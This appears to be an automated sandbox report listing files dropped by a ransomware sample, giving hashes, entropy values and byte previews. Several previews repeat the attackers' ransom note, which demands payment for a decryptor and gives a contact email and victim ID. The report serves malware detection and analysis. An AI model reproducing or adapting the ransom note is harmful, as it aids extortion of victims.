                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Secret Key
                                                                                            Category:dropped
                                                                                            Size (bytes):3261
                                                                                            Entropy (8bit):7.9454917590831835
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:JJjpNMbB7YzQmNdGmi9HLEhxTJDikxhcXmdc4m0y:fjMbB7949SLEhxTdi2dcj0y
                                                                                            MD5:70548AB0645187445C58BBE0CE709756
                                                                                            SHA1:08839E204C05F005AD1D4A1D8C6393E55B0EAEAA
                                                                                            SHA-256:FA482A07C3ECAD8B00B8066807A2B1BE6366D67CEF68B83F915619361CAFED86
                                                                                            SHA-512:3850F102E552A160B727719F9B4C33026617AD19DC6C6F15AF5B0C2A8CBDDD925590696DD4A8F27BF985894AB581FB31210472549B4F9641BCF6AC772061ADC0
                                                                                            Malicious:false
                                                                                            Preview:./.].KS...'_..2.Igg..U.9..t.V.9.P...j3!..9.=...}>U*.t..$!.S&mT.......[y......e_d+..gKd.&0....#.6....q.ig.2....S.?<9n...C2."......."..l..........cI.......Ko.P?U..&{}..k../.. .j...i|.....(.X.k...D...DWi+Az.u........ba....t.p....lC}$.A+q...2p.t5<..._..i.4. 3...6..O..s)....w8.\..Ir...cH..Hs.N!.dW..l ...nvF.q.r.....8..Z...++...]...9}k^9......B..i.4.%.5S.y.R.8n....]m).9M...S.#.].....OD.9P..\@/.!.2...I;.+...u$C... ................dh.J..........C....N.N|..l..x.W.x.eu.4..=....J\....e.g.=Qr.a).K.Ud.[..)..bZ.....Ho.G.tJ!`.K..p..;...qy....-...W..x......k.+...+...IN.7..T/..k.CG>...g..g...v....wp..5.z.oK...P...y.^L.A..f.Z..J"..O..g.U(T.9..u6c...8.#.R.......W...2...ha`k.C)z.i......t.......-.........Z^...L..Z......y.T.>=...S..R.....{ECd..XW../............Z.<..7....].-r.E....T.nk........9.$B..vMo4..h.m.....Y..........hd]..... `z..x.BB.. ....u9..T..^.v[z...;?...e[.>...(.2.b..c..nW......).zv.@.........rW....6.]p....3...\o...MN........dl..{.L..._.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):716
                                                                                            Entropy (8bit):7.725895229706554
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:pypZYsXCrNnsUU5NCOuBKsYUjcTf2qzXUMAaMzB8WAJwAVnmwGHatJHshI7Mmpyx:FsXCrNnSD5uJNY7X1AlzBH7AVmwxtJgJ
                                                                                            MD5:509D61077A584AEA7B0EE8DFC811C33D
                                                                                            SHA1:E42ADCA088468F82BF47DB14A5877204F1CD8AF1
                                                                                            SHA-256:CE6B05E9159AB8B02581769B25342428821311D206445D8DB060E0E966BD69F9
                                                                                            SHA-512:D8C50A686112829443AFF2634F5C9834030C2F338FB9B91280E6EA4DEEC356C602CC314E918E4B2787AA8CB02EDC2311BE088C89AFCC7EF69FCF6F592FF135F9
                                                                                            Malicious:true
                                                                                            Preview:..j...i.R.d"..r...*...j......dx...VmN..._B.g.@.A.....b~CO....Qc{Z..h.;.0...(............"&hr&1..q'....8pQmo....or.Rz..Z.e..|L.......(....~h..(...v[*.!..... r.....J....%`...^.+.....t.....W?m..L)|%#....w9...C...Z...(u.;........u'.X..P.U...H@....(..F......@d...ywa.&....Z\-.;}.`.W{zEd6.rX.....5L...s....O.X_.=...f.6...D....=c..L[.3.-3.[...s.V.....R....B&....F......~..S.+)suQgGO1D...n...,....@vSE...k.......5.d..K.`..Q....P..../<.0.d.[.. .'._.2Us...K|....W.4@!.P...i.Q...>..Ca.#e.^.8B4.Q...ImO-.~;....8.p....S.Qg.$e..)_.a..s..........g..o..E.t\PuOY3.G..y$....E5..n...O....:....xb"a.{.2D..2....-P...=.....8$I.QC[/vgY.D.p....=.6...ge.X.%x7*.I.Nn[..h;c.P.q..l.."..VZr...sx.60xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):5667
                                                                                            Entropy (8bit):7.845002345761035
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:k/b6DmcaDAFOFkvR1TVKdoDmabpD26jTCd9Xc9vDFg6jRd06+2rS:kz6ScakakvRDDVpL/SlcN5g6Nm6+gS
                                                                                            MD5:9E590A9ECD466341E831184C394DC1F1
                                                                                            SHA1:0D2C337B8A61C99203D785938668B6B7DEA26E43
                                                                                            SHA-256:A4FDC10BAA0E5F0A7173F861BE3B8CB6DBE22E06D16388AE0DA1B36C61E81745
                                                                                            SHA-512:CC9356E505D29D457491F374BF2914B6906AB0B19AEA8842FA69791588AA1E0318FF69068269FCF47EAF3AF80143AAF0B516B36B2434173970C0002D3D5BAC38
                                                                                            Malicious:true
                                                                                            Preview:...v)D:..-.z........_.......e3H.N:K..a...W_...GusXA.X.[3..o.w..lg:.NS.l.N..f.*......".|._... ...K)....J...%..{_:. .].....1.>.1SI.o4G.:9Z%.@.E..jw-.@....g.....Nn.+f.o....j...I.YF....c.86".....$...F}W.8+bf....Kv..[..y.HXh..tE...#.2..|.A..^P.%.(...>.......y....$Ui.b@....M.20._:...."L.>v.....D.....v..f........_..n...:MJ.R...H^..x.".F..E..;t..b..xa<!..E........fE`..j.....U^.M.....t..P..g.0.N.....91...9.?.......t.....GQ?M;......Zt...}....=......!..mkh.>...|...........0Up5Cr..nXyq.kb..B.:.l_..>....Gyz.H..>..X....[q..g..W...v+.v...V>Jy3U..a=.....ay.....E:E.r@......NsU...%1...._.vj^}...q......~......<..r.......,..6...._......ZN&......}.z.l....0s/....).n.uDO......q...W.,.....I..%6k]Z...........r.5Q.2%.....b...Bu.TE..;.$..P.HJ6ZY..DHZ..2|e.........y.:...b.^}s..tv P..b..<.C.4W...[$...%.5....-..c....hN*..hk&.h.\.....E|..dF:..F..=..}..h.....W.O.(!*.;.....V.##.Y.R.e..x.4.Z=#'(\].*Yz0Z......J!ev&sqX..T..A..J..w.}.a.B.*Pc.[?.ni.#,mK.....o
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):290
                                                                                            Entropy (8bit):7.250384457290876
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Y5xKPz94R2TYIoFmyXZkMDFHKht9mcXqJzFahwYl3cxODSDn:YWxHTiFFZkCqhWcizghwi72Dn
                                                                                            MD5:631E660BE87219512D5CFF859C3A5644
                                                                                            SHA1:93384E0893AAA7043688CA4C3205EDDDCA991AD6
                                                                                            SHA-256:333D09E831B1AE888149A6EAEF07BC43F0C13C176F1A8FA976A6DCFBD34AAB2E
                                                                                            SHA-512:D5FFBAC36687522A236565D0D4009EAA95E0CB9FFEF1A9CF65F016A66602D41A26FA17DBEFE02912737379B9DA82CBC55F5E36F07E2D80C86558ED35677DB3BE
                                                                                            Malicious:true
                                                                                            Preview:.=.o..@..x..PM.Hons":[]}.....y.......w.H...u[....+.j...,........U....i.....OZ.+...WI..w&.:..C.M........r,].'..\.R..B.I..;...h.!...h*..p'...g....H...l~....t\X.$..Hr.....7......:9.\.......O....6:.Tf...q.j-D..~.M$P....> .}.IAD.0..X......%...4..g.,I...A.?n%Q#[.._...yZ0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):229642
                                                                                            Entropy (8bit):0.8762349174552447
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:ldiINfs61zkVmvQhyn+Zoz67C333JwMMUNlBN80/LKXkjCWk:3jHEMr1CRb
                                                                                            MD5:1977ED98863A0084F46DC7260EFDE135
                                                                                            SHA1:6C91E5152CDAE3D6A920038BC307D0888E1EDB14
                                                                                            SHA-256:DB43573F2559294331B70C5D32F77BE00CA96525102FB2910C12B78A6D5B6FC2
                                                                                            SHA-512:21246518E5F7A30F627764BEA6C7BAF91A90056520614DA787E71EF67C9F970666121273D946965441353D19D9ABA0FC2E63EA13A12F149EEDE8F37BA12668BF
                                                                                            Malicious:true
                                                                                            Preview:X....NJo.F.......".u/..X|G.I..T.;x...D..-.2.biu..[.:/....../....&7y+.U?.WKR...m....^..t..v^QIye}}o~.x..E.T.....EKT$..~..V...,...).a...F|.....7.3K.C..f.-9.`f....Q.".I..9u..|...=.......RN."..+&....z......[.D.S_........y5I..k.Y..y...dE|..7+...&.T.F/F......w......r.#3..%&. 3...38..yP:.EP......2b.8.|U..>W..QP<.}..p._)%........d.8.":...L...p%..W2ZQv....!.u..+.@.B..}&jJm..5.8..gl..............7.2..*..c..;..].EQ.lp....?3....Td..>!...*/..e{..... |^l..%.D..g...).0...j...... >....`.Vwr....Kq..Xv$La.R...A..i.........1.O.....{.'.s......,.u..i...'.#a.+;O..M...E..r........A..3.m....~)..r...*.U...d..).o(A.....H,|;...}aZA6....&:i....."W....ZY.,.Gi..\.u;.[..Y..[:......*pn.Jl.. }"|\^0*_`...F.}..3.....SrY.mg8..Q..]..\%'.*..&t`!.8.s,.....o.5@.pp..<.p+..K..~..x...+..3.g..C.k.+.....VlI...i.....@}....X`.?X...p.....R.7...g.Z/.f.._.B)/...t.k....K.!.L.-.[....n.@{5..V.."[..v..=O...*C..@..fK..#..(E...{..^.z...].N..EGP.-...t.N...n]......E^e/..S._8.o.R.a.a.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):466
                                                                                            Entropy (8bit):7.487627664233794
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:aHoagljF8CLjPGvidcBMS8edz5kp9KR2YCdn:6oagXL0BZH/kpCCd
                                                                                            MD5:D19CC03E5457C007B6B20A0D85AB9A64
                                                                                            SHA1:0AC84B33731557DF71C8242404831E790ED65746
                                                                                            SHA-256:A09BF1F70339F6F48E7963FA93DD7DFEC0999E9675489B6C457F30481B65E7C6
                                                                                            SHA-512:861DC8F77783CFB3ABE17C80A94F01295437E78EC3F6880CB6C32B72305A98600CAB0F908A55CBA03BAE9C31438296278C78579147C3692B84BB4CB0D8523B5D
                                                                                            Malicious:true
                                                                                            Preview:W.jE.y..i.k....P..dl:s*..............4.._.....cB@*x..._.t^..K...]..j..w..........7w..4t.F.iF.&..0....\.>....Q-n>...cR5.E.]G....^....(.a.y..?P_.Q..l....A...d[Z..b@..3...9.......p/..rowser..M.t.JzY|..E.Ei..vTJ...?.."j."..X..4(.(.Ks....>yv.._]........a...."..l..../...d.......:.+.G..B....j4....K+....e+...d.CY.M.....|B6D[YM.h...P...i.n.W.cJ..c1........k...~..=Y.5...L.[....{BsV...~..].s....o..........CA.;....i.....>...q.q.T...[........g0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1141
                                                                                            Entropy (8bit):7.840179772691202
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:BltgkZZhCyDrXbCyl2PW+7TYIria4pi52ubiv/Wt/84TU:B/ZPTCyl2eETY77MRbcsxA
                                                                                            MD5:9F4BF96F7E94541A435388AAA629B9AA
                                                                                            SHA1:FD1B1F668932AE2CEF4BF6F366531AB8D7F90D9A
                                                                                            SHA-256:9B0DBB7AFEAB43903E9D1D38FBBCA4314FAFBF7AC4E7458B3504B26B505D7E65
                                                                                            SHA-512:91FC641D0D068CC7442982563766DDC814433F94018BDCF8B05934126E9EEB02A5A27925C5A27D8A20E25A5BA739CB88539BA8E555ADEAE9F3450462C965BB87
                                                                                            Malicious:true
                                                                                            Preview:.#.....8J&8..J.(......8.@.$.E.Y.|Q.u!...cR.g.$.9..U......... g...5X.b50..<.=.I.l....a[.C........<...tUOYR.~.=....c...<46..by..$....H".V......u%...x.%^6O.......I.Nz.5.......&.........,q3...M...K..Z_y.O..22x....ZU.T.D..vxO....{....rX..8o ......3.....].7..~.J.L./:.L...heD..}..W.l...\.......(.Ep[{Mn~49....7.}$.....-.:.A. .1<........t.b...qA.XcC.>h...tY.C...pGE....].....5....Jl!}..J..."..OI.%.WMy%s....U.7....Z.==Lp..5.yw_...<U..uD......c......I.W!.>8.X......bn..-...w..........>jS.1...;..dQ..P.Ml......n...V..k....S...!...Ep...~.n.Qo.....H\.4.w........K^..h(XV3..J......t4.X.d.>.].z.L.&u53z...\....j^..25.(&....:%.T;.....j{......2nS....z....&........hM..U/\F........p...>...22B...&.v..=.....;C&...VF..j.[.)o.K-;M.k.{....Q.....i.....B|...a{.J;..p.......:..@DI......]&...%.f.....X.g..D.*=o(-....k.6..)F.....P.M.z..z.G!..[..`m...sKey":""}]}....p.F....o|...c..!S..1...)'....i.I..pZ8a..\.E..'.G...(:'.o...l.%.....Z.....G.._ n.G.f)jX....M!.Yvk h....Afda..'...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):262410
                                                                                            Entropy (8bit):0.2939750772889838
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:LALXxNbi22QLSmMnJZN2lXsenKULvV0CdqUtFedtMgl+s6SR:SWWum4nN2lNnRLvVvjITjP
                                                                                            MD5:109AA3CC2E3792461E1B4807A5725A49
                                                                                            SHA1:C86281E84CB3694AFC8CFDF2156F340C8010C7C6
                                                                                            SHA-256:0871082D2E6A0652C2190FB2850F386D44372DCC3415235C285A40533FD100E4
                                                                                            SHA-512:9EBA461B0BAE3AD95DB88610D7EA6DE3D064539A463A304266F076026F9F1A912B51F2C9B76E8061B4767902FFCCF2C40DB9441611906A2AE5E7B9429A6C4E12
                                                                                            Malicious:true
                                                                                            Preview:hk....T+..m1.V.U..`.M..cF.>.9y..Mnc....&.(?....I.@.#]..zTo9.C'%...9zDH.1.Bgo.......Cv.^.dzI.?.....r.HS.>.p...L....~.._.7'.YI..*..n..@..%.....[.}.g...DF[N..L.u.d.....#p.BP..'.:l.f..9....V.b.).....S*..0.v.,J\..84.KY....6V."K.b..........c,57C.b.N.>..K.F.....gI1..z..../x.^Y`0v.....T...s..y;d.K.[.B.7W..K.....a..J.9.K..+...a.q7.......{.......'..-...x.....;.@.dW1.;..5s..8......d.|P3..rG....J.U...w.:.......gs..Z..:.g#.o..x....Fy..a....{r.x.G>6RS.O.Ets..2.:.S..<bYL...op...GJ.j.A..q"..p:.y.e#\P..Z.:0..i...kjFB....pvuF..sIb.M!.ut|1.R....SdW..pf..6.....B0..f...MH>S7....j6#....D.?...37...C.@..k0,.h...R...<-.{..U.........g.#>............NO..-..d..M_..x%].<.X.~..t..).ec.;.....o|.N...u>...*......|.?.dG...h..}.E......F.W....x.-.^.Q"..o.....\..0...L..m.#...|...V..vbG.f..k/h.c].+...B.....*.......A....|....U..LEa...z...bN4...U....H2........c..&K..b..gc..p.a).]v.....Ch....c..]y...........N..#+.....a...m..n.]wp.{.R..].qf.....U.K....+.c.W![..A...3S.6.d.-.)w|_...!'.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):98570
                                                                                            Entropy (8bit):0.6743440077175508
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:Ur0sMQZYKkSPM/TlPLcXBDo406zZbqFGD9hNafWwWxXu:Ur0vQRkV/TdQXBE4dlb1sfUxe
                                                                                            MD5:671FDF92BD93FA7380C7BA019257A366
                                                                                            SHA1:E88EE2E9FD1304FD012F1067453164DBBEB0452F
                                                                                            SHA-256:B2A040394B573899AA1A4ECD9503FCB23B6D37B3A0F5C73D18360B0DFB7AE663
                                                                                            SHA-512:65289E279707217B82DA15E85A30C5A6C607FEAADDCF3586C8204A515919DB4F2E5A9FCE0A349C1450F54B09CA47678BE66B46943A46561775631A2E5FB92A74
                                                                                            Malicious:true
                                                                                            Preview:X.jMI..r.Fu.k/.....gd.s....+0.K..VE....<1cs.;.......^..4.... .L......7G.S...t.j.....s.v.%]..om!.....'..k..iv..99.)..h.}....Hh.p....5.K....M.$N.g..u..z..z....p..i.7.-..v_H..b.....[.....*.:..t.e$...E..B\.>..Xb.m1.%....k8..|p7m..A.......n..Y...5/..yW.+%..==.`.N...C..:..":..\1.....t..&.(oZ|c_{jn...YLyQ.l.....F........].W<o..Hs........g[...?S.A.,.J>....."Y..J.....xI^9.H.l.(f....6...-.=`.=..z..s.........c.}..s;%J.r.0..V.BI.au...ob..^r.5.c....INb..KV.Fh9.kk.OWl...y..7\m..E..Lm.On.Z.~..!....lbJ-f..&S..vW.,..J...~+.3......~j....K..55D.u...9...k...h.....r....%5u....wT<......=s.S..6..~.47..<N.w..}.5...s..x...}.#..K..k...*....t...x...z...+..y..uNe]-.b....t..c...Fl....|. 4.N..5..$.....2.......0kqs..5..........-......x.B.....1@_`..x.f~.i..k0....xdx{..e.R.6xD.....Y...m..'.a.......;R.O...`|...Y$..r..9-s..B..U3.ht*..q.>..X..C~)...}..z.Y....W..I.....-....n.....H..y.6H....K../-..9.b.9y....[..p.>.)...R....H..HdYX(L..-Y.G......m..}N0...i~.....K...F....Px.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6053528912974337
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:6f6dJA+ngwyA1dN+YMU3IRJPz9AYo4I57n+Xb30ieou:6ibA+ngwyONXM/Rz9AYjU7n7ou
                                                                                            MD5:6DCEB09394F1BD0F040CCEA23E629C49
                                                                                            SHA1:93042D126D40B3557922F35D320A793A1D594CBB
                                                                                            SHA-256:F7BB8A44DF58161B9DC557FDC7BB975B7923065DD1BDECA89F2E4A7EDD2C0218
                                                                                            SHA-512:0FD3F9CD6EFD0C32CFCBB1E433BC1F3921595201A5B4FFEA26880BE641E116F4611DACE7A75B40A80B7ADE5FCFBC6FC8F8290934CE559733C68CC62CACBFAD3D
                                                                                            Malicious:true
                                                                                            Preview:'.6{."..u.J..2G1.B{#^....z"..R..?:.l%........F].%A}...`.{.[a...1..]........#..x..u.1..)...a..p.1.T..Z.T5m..n...};.1.@.......~2.G..6..&............Ii.....C[../g..KVU.<A.#ew............1._dY^<.Sw....P.\../.EI.....P.+f...MQ.*.}.K....S.ej.(J...@1:lj7q........2.).-F.,..M.Lx.CI.a.A...T.}....w.L...u....x'n.J.S..........q..6.Y.~PC[cf..Qb..\.......B.+7.5.!....fC......7*ZQ.T>.+..a.....G.P.?.s8U..-w.A"....V#....AR...x..E.tD......*...........g."..Jh.P..T.m......%.*a.....U...Lq.-\...R.......}.;.!.....m.j...@[..*..^KF.X..}.(..{...b.e.9...{.Q..d.Y.bEz.DD_..A2_$...._..B....M..0E..<.c..N4.(..MFM0.}x.H$eU.&~)W...T...[..Q..:Z.G..s.@..6D".....Gz.0.^....*.oW.0.V..E/QpF.t...A5ZY..T+.A.\).."..U..f.e.2.2k{....8?&..)(.!...+s....A#..^....8..g.C/.Y.~...p.Z..G..R.{F...i.rQb...i.E.PI.@......u...w!V...#U...8:.e!.R.P.0.%....\T.a.G...>#`..([...s...k7..\.u....s.(.X.jd.V.3....^8f....^..@.:.v.........i.#b..`.'...|..9.L~..C.m.J..H...;.@.$%...D..L./....i.........?.1.i.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.226634958474587
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:zxNxVR5pksOvA2wya+K40Kje7POcmPdhN40rv+rHPOdQPIZn:zxNBlx2v04eLbmlhN40rv+rGdQAZn
                                                                                            MD5:22CB9F025234DD1828F8FF00673C1D12
                                                                                            SHA1:625D16CAA3B1858FB0A0C0A8B28BA4E3F7C986A5
                                                                                            SHA-256:E669F500B7ACB9163D9FFACCB13F3D146981AADC91D8D963CC91758554D499D7
                                                                                            SHA-512:705D14EF1E823BC25D75AE16458EE5017D2017AB4160988EF509E01FC1EFB96136904127C173D33FC51F875A2EF12CD9007B83D4B4A9AB65A6E9F6B5B972625D
                                                                                            Malicious:true
                                                                                            Preview:.........+`...X..........A.04..PR?..l.U.9%....q.CI.X<.c..jl.......2(%E....O..B..OS..h.h..@...../w....P.<..*..Bf..%.?...=..i.[Z..Fu..P{jnQ..(..y.+..~'...8rS.K...Y7....c=..n.q...w#'.....e...5.H.....W..^2...Fk.j.....O.......8.|2U.&..3..6.i.K.^U.<.V..9..g.[...>..p.wJ...h."..O0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Secret Key
                                                                                            Category:dropped
                                                                                            Size (bytes):3773
                                                                                            Entropy (8bit):7.956844710381549
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:dBnTj1NgUlUSqUPNjwR9C2IBmQVRfijBErkH:dBTDgUl7pL2IliWoH
                                                                                            MD5:9490198416EDD268D1C0CA72241502AE
                                                                                            SHA1:CA52E850D0540FA8462186A8729840DAD9E5EF49
                                                                                            SHA-256:D888B3A365127E9F40A728E886356633547961B4774D673954D21B2553C23D80
                                                                                            SHA-512:758146E57571D8E26E321FE15FE0F154DD539D0B1548209A173F5CE8E61759481F3CB78B05E18B9736745F545467B5375A826E34B10ACB0A84282688C22F4558
                                                                                            Malicious:true
